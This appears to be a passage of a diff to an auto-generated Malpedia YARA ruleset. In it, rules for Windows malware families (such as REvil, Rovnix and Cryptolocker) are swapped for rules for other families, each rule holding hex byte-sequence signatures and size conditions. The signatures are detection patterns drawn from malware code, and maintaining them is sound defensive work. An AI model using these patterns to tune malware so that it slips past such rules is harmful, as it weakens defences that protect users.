-		$sequence_4 = { 8d4010 83fa0a 72dc 8b8d0cffffff 2b0f 8b8510ffffff 1b4704 }
-		$sequence_5 = { ff15???????? 50 ff15???????? 85c0 0f84db000000 8b5dc0 }
-		$sequence_6 = { 41 81f901010000 7ced 8a8619834200 88843319010000 46 81fe00010000 }
-		$sequence_7 = { 89957cfcffff 899578fcffff 899de4fcffff 81bd3cfdffff80020000 8bbd1cfdffff 89b5e8fcffff 8bb538fdffff }
-		$sequence_8 = { c1e10e 0b8d28fdffff 318d68fdffff 8b8d74fcffff c1e112 0b8d24fdffff }
-		$sequence_9 = { ff750c 57 6a01 53 ff15???????? 50 53 }
+		$sequence_0 = { e8???????? e8???????? 81c480000000 e9???????? }
+		$sequence_1 = { e8???????? e8???????? 83c418 6a3c }
+		$sequence_2 = { e8???????? 83c460 e8???????? 83c40c }
+		$sequence_3 = { ff15???????? 85c0 7507 c685e0feffff43 }
+		$sequence_4 = { 68???????? e8???????? e8???????? 83c474 }
+		$sequence_5 = { 50 e8???????? e8???????? 81c484000000 }
+		$sequence_6 = { 8d85dcf7ffff 50 8b450c 53 ff30 895df0 }
+		$sequence_7 = { 8d85dcf7ffff 50 ff15???????? 85c0 0f84a1000000 }
+		$sequence_8 = { e8???????? e8???????? 83c47c e9???????? }
+		$sequence_9 = { 69c10ba31400 894d80 2bc2 66894584 }
+		$sequence_10 = { e9???????? 694d940ba31400 ba51754269 2bca }
+		$sequence_11 = { 2bca 884c0588 48ffc0 4883f808 }
+		$sequence_12 = { 2bc2 66894584 69c187fd701e b934eddb95 }
+		$sequence_13 = { 85c0 750a b043 66c745a04300 eb03 8a45a0 }
+		$sequence_14 = { 8bcc 8d85e8fcffff 50 e8???????? }
+		$sequence_15 = { 894d94 b925000000 e8???????? 0fb64d8f }
+		$sequence_16 = { ba51754269 2bca 69c10ba31400 894d80 }
+		$sequence_17 = { e8???????? 0fb64d8f 4c8be0 440fb6458e }
 
 	condition:
-		7 of them and filesize < 363520
+		7 of them and filesize < 4891648
 }
-rule MALPEDIA_Win_Webc2_Greencat_Auto : FILE
+rule MALPEDIA_Win_Cryptic_Convo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c501ff13-71e5-5a46-9388-bd1d1013ee63"
+		id = "66ff4a00-02d0-5dfa-b2f7-7b3271a8876d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_greencat_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptic_convo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptic_convo_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "4d09295114ba5dc3575e8f0ceeceef8f83e2061d012afdc45a6be16a472e1786"
+		logic_hash = "e28456acfbd5652f4b94b426affd2f208681769134e3003d7681a2d2c78d8e5f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100335,32 +100513,32 @@ rule MALPEDIA_Win_Webc2_Greencat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 0f85ab000000 bf28010000 8d85c0fdffff 57 53 }
-		$sequence_1 = { 50 e8???????? 53 50 894614 }
-		$sequence_2 = { 8d4dac ff750c e8???????? 85c0 7511 6830750000 }
-		$sequence_3 = { 53 ff15???????? 55 e8???????? 3bf3 59 7407 }
-		$sequence_4 = { e9???????? 8d45ac 50 ff750c e8???????? e9???????? 8b4508 }
-		$sequence_5 = { 58 e9???????? 56 be00010000 57 56 e8???????? }
-		$sequence_6 = { 5a 8b7508 668950f8 8950fc 668910 66895802 66895804 }
-		$sequence_7 = { 8d0c30 03c6 2945ec 03d9 85f6 75ac 3975fc }
-		$sequence_8 = { ff15???????? 83f8ff 8945ec 7411 ff15???????? 3db7000000 0f84de010000 }
-		$sequence_9 = { 50 ff15???????? 3bc7 59 7405 a3???????? 8a45ff }
+		$sequence_0 = { 56 57 8bf1 e8???????? ff7674 8b3d???????? 6a01 }
+		$sequence_1 = { 2b459c ff7674 2bc7 40 99 2bc2 }
+		$sequence_2 = { c3 6800090000 6a00 e8???????? }
+		$sequence_3 = { 034d08 bb00300000 663bd3 7505 }
+		$sequence_4 = { 8b450c 53 8985ecfcffff 8b4514 56 8985f0fcffff 57 }
+		$sequence_5 = { 6a5c 85f6 7403 56 }
+		$sequence_6 = { 7905 4a 83cafe 42 7510 ff85b4feffff 8b95b4feffff }
+		$sequence_7 = { 8b85ecfcffff 8b95f4fcffff 53 ff7510 89540134 50 }
+		$sequence_8 = { 50 e8???????? 83c40c 33c0 8a88b0664000 888c05dc010000 }
+		$sequence_9 = { 3b85d4fcffff 750e 8b4610 03461c 8985a8fdffff eb0b }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 97280
 }
-rule MALPEDIA_Win_Rovnix_Auto : FILE
+rule MALPEDIA_Win_Smanager_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "32481422-18fb-556e-8e6c-7773a418af62"
+		id = "9094b6d5-dd8f-5044-9d10-3bb7c70d2fbb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rovnix_auto.yar#L1-L329"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.smanager_auto.yar#L1-L227"
 		license_url = "N/A"
-		logic_hash = "ba6bf6a0e452ea16caba209e420afba03e6b6e5de61f66132ac7c6a92113c249"
+		logic_hash = "e0a2b573b878cce9fd789f6f7825fb445120b343d0f7f8893519c9a9cc16ccfe"
 		score = 75
 		quality = 73
 		tags = "FILE"
@@ -100374,58 +100552,46 @@ rule MALPEDIA_Win_Rovnix_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c335 c1e902 ad 2bc3 }
-		$sequence_1 = { 57 6a00 ffd2 89442408 8bcf }
-		$sequence_2 = { ad 2bc3 ab e2fa 61 }
-		$sequence_3 = { 837c242c00 7405 57 6a00 }
-		$sequence_4 = { 8b15???????? 83e7f0 89542418 83c710 8bea }
-		$sequence_5 = { 60 bf40090000 be???????? 8b15???????? }
-		$sequence_6 = { 8b4d0c 897604 8936 8d7e08 }
-		$sequence_7 = { 8b7e10 eb06 8b5d0c 8b7d08 8bcf }
-		$sequence_8 = { 8bc2 c1e802 25ff000000 8d4cc324 8b01 }
-		$sequence_9 = { 85c0 e8???????? 8be5 5d }
-		$sequence_10 = { 25ff000000 8d4cc624 8b01 3bc1 }
-		$sequence_11 = { 3bc1 75f3 395e14 7511 ff4e18 }
-		$sequence_12 = { 894804 8b4608 8b4e0c 8901 894804 8b4718 }
-		$sequence_13 = { 894f04 8939 897804 ff4308 }
-		$sequence_14 = { 8975e4 c745ec40020000 8975e8 8975f0 }
-		$sequence_15 = { 83f919 7703 83c220 85c0 7404 }
-		$sequence_16 = { e8???????? 8be5 5d c3 85c0 e8???????? }
-		$sequence_17 = { 5d c3 85c9 e8???????? }
-		$sequence_18 = { 55 8bec 85db 85c9 }
-		$sequence_19 = { 23c9 16 85c9 23d2 }
-		$sequence_20 = { 23db 81e1ff000000 23c9 83440c0404 }
-		$sequence_21 = { 89442408 8bcf bb1092c63b 8bf8 83c335 c1e902 }
-		$sequence_22 = { 57 4883ec20 488b35???????? 33c9 bb9a0000c0 e8???????? 33ed }
-		$sequence_23 = { aa 27 ff44a8d2 4b }
-		$sequence_24 = { e8???????? 483bf3 75ea 4883c310 4983ec01 75db 8a5508 }
-		$sequence_25 = { 85c9 23c0 8be5 5d c20800 159e9dc35a fa }
-		$sequence_26 = { 488d8c2400010000 ba00001080 895c2428 897c2420 ff15???????? 85c0 7914 }
-		$sequence_27 = { 488905???????? 4a8d0c10 eb0d 488b02 488905???????? 488b0a 488b05???????? }
-		$sequence_28 = { 6232 27 0149bc 2ec9 }
-		$sequence_29 = { 8bec 23db 16 23c9 59 }
-		$sequence_30 = { d147f0 79f4 28f8 8fc1 }
-		$sequence_31 = { ae d7 b81fe9f60b e8???????? 7660 b85c8e6189 }
-		$sequence_32 = { 488b4128 4883c120 488905???????? 48890d???????? 4c8918 4c895908 33c0 }
-		$sequence_33 = { 488bcf ff15???????? 4c8d5c2470 8bc3 498b5b30 498b6b38 498b7348 }
-		$sequence_34 = { 83440c0404 23c9 8be5 5d c20400 95 367a3e }
-		$sequence_35 = { 4c397500 741e 837d04ff 750f 837d00ff 7512 488b4308 }
+		$sequence_0 = { c7462cffffffff 7410 6a00 6a00 }
+		$sequence_1 = { 8b4608 85c0 7420 a801 }
+		$sequence_2 = { 83c602 6a22 56 e8???????? 83c408 85c0 }
+		$sequence_3 = { 740e 3d45270000 7407 3d46270000 }
+		$sequence_4 = { 51 51 ffd0 83c40c c7460800000000 }
+		$sequence_5 = { 8b7604 6a00 6a00 56 }
+		$sequence_6 = { 8b4510 85c0 7407 50 ff15???????? }
+		$sequence_7 = { 56 68???????? 6a00 6a00 ff15???????? 8bf8 897e28 }
+		$sequence_8 = { ff15???????? 32c0 e9???????? 0f1005???????? }
+		$sequence_9 = { 8b43ec 85c0 751d 41f6c040 7408 488b07 }
+		$sequence_10 = { 0000 80ed4a 0044feff ff900100008c }
+		$sequence_11 = { 0000 0c0c 0c0c 0c0c 0c0c 0c0c 0102 }
+		$sequence_12 = { 0007 b15a 0089b05a0089 b05a }
+		$sequence_13 = { 85c0 745c 448d4368 488d4c2470 33d2 }
+		$sequence_14 = { 448b842498000000 488b942490000000 488b4c2448 488d842480000000 4533c9 4889442428 895c2420 }
+		$sequence_15 = { 0008 53 4f 00ef }
+		$sequence_16 = { 4863ca 8a441918 42888401b0210200 ffc2 }
+		$sequence_17 = { 488bce e8???????? 8b07 488b8c2480000000 89442430 488d442440 448d4301 }
+		$sequence_18 = { 0003 b157 0000 0c0c }
+		$sequence_19 = { b920000000 498bd0 482bd3 488d81deffff7f 4885c0 7417 0fb7041a }
+		$sequence_20 = { 0007 b15a 00c4 b15a }
+		$sequence_21 = { 0007 b15a 0007 b15a }
+		$sequence_22 = { 0001 ce 50 0008 }
+		$sequence_23 = { 751c 4883e0fe 488d4f08 4c8b08 4d85c9 740c 41b802000000 }
 
 	condition:
-		7 of them and filesize < 548864
+		7 of them and filesize < 10013696
 }
-rule MALPEDIA_Win_Revil_Auto : FILE
+rule MALPEDIA_Win_Payloadbin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6d9b3831-9422-59dd-891e-cc56c498429e"
+		id = "479cd137-2967-575a-8de8-bab23a965cce"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.revil_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.payloadbin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.payloadbin_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "5ffcb29efd36b8555dc7beef77a59c8169ca5a939654167ee68e6e55a4f62dd3"
+		logic_hash = "810f81f232eae27d52097e88c16ab90183a29e32277d9224dad94d2d9c691817"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100439,32 +100605,32 @@ rule MALPEDIA_Win_Revil_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33f6 6a00 6841db0100 ffb4356cffffff ffb43568ffffff }
-		$sequence_1 = { 50 8d8538feffff 50 ff7508 e8???????? ff7508 e8???????? }
-		$sequence_2 = { 8b80c0000000 8b5d08 8945ec 8b4508 }
-		$sequence_3 = { 0cc0 80c980 880437 884c3701 }
-		$sequence_4 = { 8365d000 807d0f2d 8b75f0 8975f4 7408 83ca02 }
-		$sequence_5 = { 4b 8955f8 e9???????? 837db400 }
-		$sequence_6 = { 8bc2 33437c 33cf 3345fc 894b78 8bcb }
-		$sequence_7 = { 3345e4 89417c 8bce f7d1 8bc2 234ddc }
-		$sequence_8 = { 81ecf0040000 53 56 57 bf90000000 }
-		$sequence_9 = { 57 33db 89b53cffffff 8d8540ffffff 43 }
+		$sequence_0 = { c744243003000000 488d4c2470 66448bc9 4487c2 6699 4c8d48b0 }
+		$sequence_1 = { 4d0fbddc 23c6 480fb7cb 0bd8 0fbfca 6698 418919 }
+		$sequence_2 = { 68eb3a8171 55 68396f8656 6819276b5f 682109a155 4c8b6c2438 48c7442438404fa1db }
+		$sequence_3 = { 4881c308000000 660fa4d81f f6d8 f9 9d d2e0 }
+		$sequence_4 = { 4153 310c24 6641ffc3 415b 403aea 6685d7 4863c9 }
+		$sequence_5 = { f9 f8 4151 41d2e1 311c24 4532cd 4522ce }
+		$sequence_6 = { ff15???????? 3ac3 e9???????? 0f8492010000 440fb7442430 488b542438 490fb7c9 }
+		$sequence_7 = { 8d56d4 fa 158935079e 9e 4657 250543b1d9 f661fd }
+		$sequence_8 = { 440fb7c1 4080fca3 6683f819 e9???????? 0f8703000000 4503c5 0fb703 }
+		$sequence_9 = { 4180fd52 4983c004 3bc8 e9???????? 0f860a000000 b801000000 e9???????? }
 
 	condition:
-		7 of them and filesize < 155794432
+		7 of them and filesize < 3761152
 }
-rule MALPEDIA_Win_Evilpony_Auto : FILE
+rule MALPEDIA_Win_Unidentified_077_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ac551db8-0573-5b4c-8b60-da95879223db"
+		id = "c6846d21-78e4-583b-8f44-246681283285"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.evilpony_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_077"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_077_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "0bf858d26f7e4c261dccce71f7e0ab87c5f711b7c43013273d044a5073bd8d2b"
+		logic_hash = "ae8dcec1ad8cfc6899d8fdf0b1cf7ff7e070518ed02c06d0a8c7c2869d228f4f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100478,32 +100644,32 @@ rule MALPEDIA_Win_Evilpony_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff74242c ff750c 53 e8???????? 83c418 85c0 7488 }
-		$sequence_1 = { 8d442420 50 ff742420 897c242c bbff070000 57 eb50 }
-		$sequence_2 = { 897df8 397df4 7654 3bf7 7450 8b4668 6aff }
-		$sequence_3 = { ff15???????? 8bd8 85db 747c 8bc6 }
-		$sequence_4 = { 837c241c05 750b 53 e8???????? 59 89442428 }
-		$sequence_5 = { ff75fc 8bf8 ff15???????? 85c0 7411 56 57 }
-		$sequence_6 = { 8d55b8 52 6a10 897dfc 8b08 50 ff510c }
-		$sequence_7 = { 50 ffd6 83c410 8d8564ffffff 50 ffb500ffffff ffd7 }
-		$sequence_8 = { 85c0 0f8485000000 8365f400 eb06 8b5d08 8b450c 8b0b }
-		$sequence_9 = { 33c5 8945f8 8b450c 8985f0f7ffff }
+		$sequence_0 = { 8d4210 83c220 f30f6f0418 660fefc1 f30f7f0418 413bd1 }
+		$sequence_1 = { 48894640 488d05a1fcffff 48894648 8b442424 }
+		$sequence_2 = { 4933f8 4a87bcf1a0bf0100 33c0 488b5c2450 488b6c2458 488b742460 }
+		$sequence_3 = { 4c8d442470 897c2470 488d542468 897c2468 488bcb e8???????? 85c0 }
+		$sequence_4 = { 498bc6 4823cb 4823c3 483bc1 7354 6690 b910000000 }
+		$sequence_5 = { e8???????? 85c0 0f85c6000000 448b442468 }
+		$sequence_6 = { 488b8dd00c0000 4833cc e8???????? 4881c4f80d0000 415f 415d 415c }
+		$sequence_7 = { 33c0 488bb424a0000000 4c8bb424a8000000 488bac2498000000 4c8b7c2460 488b4c2450 }
+		$sequence_8 = { 751b ff15???????? 488bce 418907 }
+		$sequence_9 = { 488d0592fcffff 48894630 488d0597fcffff 48894638 488d059cfcffff 48894640 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 270336
 }
-rule MALPEDIA_Win_Skyplex_Auto : FILE
+rule MALPEDIA_Win_Acbackdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b9600ce3-b74e-5061-ac1d-1291ed2f5256"
+		id = "5acb810f-7fcf-50a8-b5e5-5957312412ae"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.skyplex_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acbackdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.acbackdoor_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "30e30eac39bd800313b58f678b351c49e62a23e2940a68311cb3c8e508d044fd"
+		logic_hash = "e7c1851e66beefe0ede613bab170645d1cd40698015b7587734102d809a005df"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100517,32 +100683,32 @@ rule MALPEDIA_Win_Skyplex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 0f84c8000000 68???????? 8d8538f7ffff 50 e8???????? 83c408 }
-		$sequence_1 = { c1f805 57 8d3c85c0af4100 8b07 83e61f c1e606 03c6 }
-		$sequence_2 = { 6bc930 8975e0 8db1709c4100 8975e4 eb2a }
-		$sequence_3 = { f7bd1cf7ffff 8b849520f7ffff 50 8d8d40fbffff 51 ff15???????? }
-		$sequence_4 = { 85c0 7430 68???????? 8d8d38f7ffff 51 }
-		$sequence_5 = { 6a01 ff15???????? c78544f6ffff01000000 eb0f 8b8d44f6ffff }
-		$sequence_6 = { e8???????? 83c404 99 f7bdc0f6ffff 8b9495c4f6ffff }
-		$sequence_7 = { 33f6 33c0 0fbe84c158564100 6a07 c1f804 }
-		$sequence_8 = { 755b e8???????? 0fb6c8 85c9 }
-		$sequence_9 = { 8b02 8b4df0 51 8b502c ffd2 8945fc 837dfc00 }
+		$sequence_0 = { e8???????? 85c0 0f8524020000 83fd04 0f8326020000 85ed 0f853c020000 }
+		$sequence_1 = { e8???????? c70424???????? ff15???????? 894500 85c0 7488 803e2f }
+		$sequence_2 = { e8???????? 8b83f0010000 05b8030000 890424 e8???????? 8b83f0010000 89442420 }
+		$sequence_3 = { e8???????? 803f04 89c5 7567 8d440001 39c6 7555 }
+		$sequence_4 = { e9???????? 8b6c2448 8b9c24c0000000 8b83f4000000 85c0 0f85d8020000 8b03 }
+		$sequence_5 = { c783b008000000000000 c7838c05000001000000 c7839005000001000000 c7839405000005000000 895c2404 890424 e8???????? }
+		$sequence_6 = { 8d57fe 0fb7c0 39d0 0f85bc050000 8d4306 8d342b 89442458 }
+		$sequence_7 = { c7442408???????? c7442404???????? 890424 e8???????? 84c0 0f8519050000 8b83e4000000 }
+		$sequence_8 = { ffd0 85c0 0f8863010000 39c5 0f865b010000 29c5 01c7 }
+		$sequence_9 = { c744242005000000 e9???????? 83c803 8906 8b4304 89442410 85c0 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 1704960
 }
-rule MALPEDIA_Win_Ddkong_Auto : FILE
+rule MALPEDIA_Win_Cryptolocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "18188be3-073f-50a3-9f50-97e094dccbb5"
+		id = "1c4f4307-498a-5b8a-b0ac-d9860b1cffe0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ddkong_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptolocker_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "91db8e15d23c634005ba3b638556ede7055d1f867550b80fb7edc67358abbb64"
+		logic_hash = "0e60803263408ddfb3182de11bb9ae9942a6a4eed3e22029213fee0c658ec6ec"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100556,32 +100722,32 @@ rule MALPEDIA_Win_Ddkong_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8065d300 8d45c0 50 53 ffd6 50 ffd7 }
-		$sequence_1 = { c644241561 c64424166c c644241746 c644241b00 ff15???????? 50 ff15???????? }
-		$sequence_2 = { ebcd 53 53 53 }
-		$sequence_3 = { bb???????? 50 53 c645a457 c645a561 c645a669 }
-		$sequence_4 = { 8d8500ffffff 50 53 ffd7 }
-		$sequence_5 = { 56 8b35???????? 8d45ec 57 bb???????? 50 53 }
-		$sequence_6 = { c645b474 8d45ac c645b541 50 8d45f0 }
-		$sequence_7 = { 8d45a4 bb???????? 50 53 }
-		$sequence_8 = { 7427 837d08ff 7421 8d45dc 6a10 50 ff7508 }
-		$sequence_9 = { 50 ffd6 898504ffffff 8d45c4 }
+		$sequence_0 = { c1e810 50 8b4610 52 ffd0 0fb6c0 5e }
+		$sequence_1 = { 83f80d 7605 663bc3 7504 }
+		$sequence_2 = { 8b06 8945e0 8b4604 8945e4 8b4d14 }
+		$sequence_3 = { 7539 ff7508 8b55ec 8b4de8 e8???????? }
+		$sequence_4 = { 48 7527 33f6 397714 7620 8b1d???????? 8b4710 }
+		$sequence_5 = { 5d c21800 8b4304 6a40 ff7518 8b4004 }
+		$sequence_6 = { ff15???????? 668b45dc 66a3???????? 8be5 5d c3 33c0 }
+		$sequence_7 = { 4e 49 79e4 5b }
+		$sequence_8 = { 740e 50 52 ff35???????? ff15???????? 5f }
+		$sequence_9 = { 8bd8 81fb7a000780 750e 807dff00 751f }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 778240
 }
-rule MALPEDIA_Win_Grateful_Pos_Auto : FILE
+rule MALPEDIA_Win_Bleachgap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7572cc07-80f2-55f7-bf6f-ae8865b15e70"
+		id = "273003cf-3dbb-5afb-a5ea-bb6d27dae595"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grateful_pos_auto.yar#L1-L163"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bleachgap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bleachgap_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "6a2ca8a11a50086a2cefa0fa6fd58b658c3b7b35f75875da8a4dcf3d3e8baf00"
+		logic_hash = "e20e0cd9d2a699ef9480dfe92d72685e3d909ce98e8e306df6822787c7e8d012"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100595,38 +100761,32 @@ rule MALPEDIA_Win_Grateful_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7411 e8???????? e8???????? 33c0 e9???????? }
-		$sequence_1 = { eb07 b8fcffffff eb02 33c0 }
-		$sequence_2 = { e8???????? 99 b980ee3600 f7f9 }
-		$sequence_3 = { 83f801 7510 e8???????? e8???????? }
-		$sequence_4 = { 7407 b8f6ffffff eb02 33c0 }
-		$sequence_5 = { b8feffffff eb1a b8fdffffff eb13 b8fcffffff }
-		$sequence_6 = { 0385d0fbffff 8985d0fbffff 6a18 6a00 8d4de4 51 e8???????? }
-		$sequence_7 = { 0fb61401 52 b804000000 6bc000 }
-		$sequence_8 = { 83e80e 50 e8???????? 83c40c 85c0 7457 6a03 }
-		$sequence_9 = { 894110 8b550c 8b420c c1e803 50 68ff000000 8b4dfc }
-		$sequence_10 = { 0f8c8c000000 8b8df8fffdff 0fb6940dfafffdff 83fa3a }
-		$sequence_11 = { 83bdd0fbffff00 7568 6a0f 8b85e0fbffff 83e80f }
-		$sequence_12 = { 83f830 7c62 8b8df8fffdff 0fb6940dfefffdff }
-		$sequence_13 = { 8945fc c785f8fbffff00000000 c785e8fbffff00000000 8b4508 50 6a00 6810040000 }
-		$sequence_14 = { 0fbe0401 83f04d 88842486010000 b801000000 486bc037 }
-		$sequence_15 = { ff15???????? 837c246400 750a b801000000 e9???????? }
+		$sequence_0 = { 8b4110 89500c 8b4110 894210 8b442410 895110 894a0c }
+		$sequence_1 = { 8d8d80fdffff e8???????? 8d8d48feffff e8???????? 8ac3 8b4df4 64890d00000000 }
+		$sequence_2 = { c78514fdffff00000000 c78524fdffff00000000 c78528fdffff00000000 0f1000 0f118514fdffff f30f7e4010 660fd68524fdffff }
+		$sequence_3 = { 83f81f 0f8783010000 51 52 e8???????? 83c408 8b8d5cffffff }
+		$sequence_4 = { 52 e8???????? 83c408 8a85bffeffff eb61 8b55bc 83ff10 }
+		$sequence_5 = { 83c404 83ee01 7839 0f1f00 56 57 e8???????? }
+		$sequence_6 = { 6859040000 68???????? 68db000000 e9???????? 55 e8???????? 83c404 }
+		$sequence_7 = { 46 8ac8 84c0 75dc 84c0 0f845b020000 e9???????? }
+		$sequence_8 = { 8b542424 8b4c2440 89450c 03ca 8b44243c 894d10 8b04b8 }
+		$sequence_9 = { 8945d0 8d4344 8945d4 8d434c 8945d8 8d4354 8945dc }
 
 	condition:
-		7 of them and filesize < 3964928
+		7 of them and filesize < 4538368
 }
-rule MALPEDIA_Win_Qadars_Auto : FILE
+rule MALPEDIA_Win_Chaperone_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "db370ffd-dc25-54ab-be3c-753161f66e40"
+		id = "5d73acaa-0673-57ad-848f-864644fbbeea"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.qadars_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chaperone_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "b7f3cdd5f9bd5d75d1b4c3d8620e10078807a9df5c67d92510598cbd69ac717d"
+		logic_hash = "891c6d4b90ff2712f27f9dbb971bf9587d22b60dd85391f9a0f86beba2f74383"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100640,38 +100800,32 @@ rule MALPEDIA_Win_Qadars_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7410 8d642400 8b0b 48 c7048100000000 75f4 }
-		$sequence_1 = { 8910 8b4510 85c0 7406 c700???????? 8b4514 }
-		$sequence_2 = { 56 8d4dcc e8???????? 8d4dcc e8???????? 8bc6 5e }
-		$sequence_3 = { 8b4dec 39590c 7405 ff490c eb25 8b4104 3bc3 }
-		$sequence_4 = { 6a04 8d550c 52 8d443801 }
-		$sequence_5 = { 8945fc 8b45e8 6a10 8945f8 e8???????? 83c404 }
-		$sequence_6 = { 8b4510 8b08 51 52 8d4df0 897704 8975f4 }
-		$sequence_7 = { 8b00 50 e8???????? 8b45fc 50 e8???????? 83c408 }
-		$sequence_8 = { 6a00 8d4df4 51 6a04 8d55f8 }
-		$sequence_9 = { 83c40c 6805010000 8d8df8feffff 51 }
-		$sequence_10 = { 6a01 8b55fc 52 ff15???????? 83c408 }
-		$sequence_11 = { 6a01 6a08 ff15???????? 83c408 }
-		$sequence_12 = { 51 8b55f0 52 ff15???????? 83c40c }
-		$sequence_13 = { 50 8d8d98fcffff 51 e8???????? }
-		$sequence_14 = { 8945fc 6a02 8b85d4fdffff 50 }
-		$sequence_15 = { 750b 68???????? ff15???????? 6a00 }
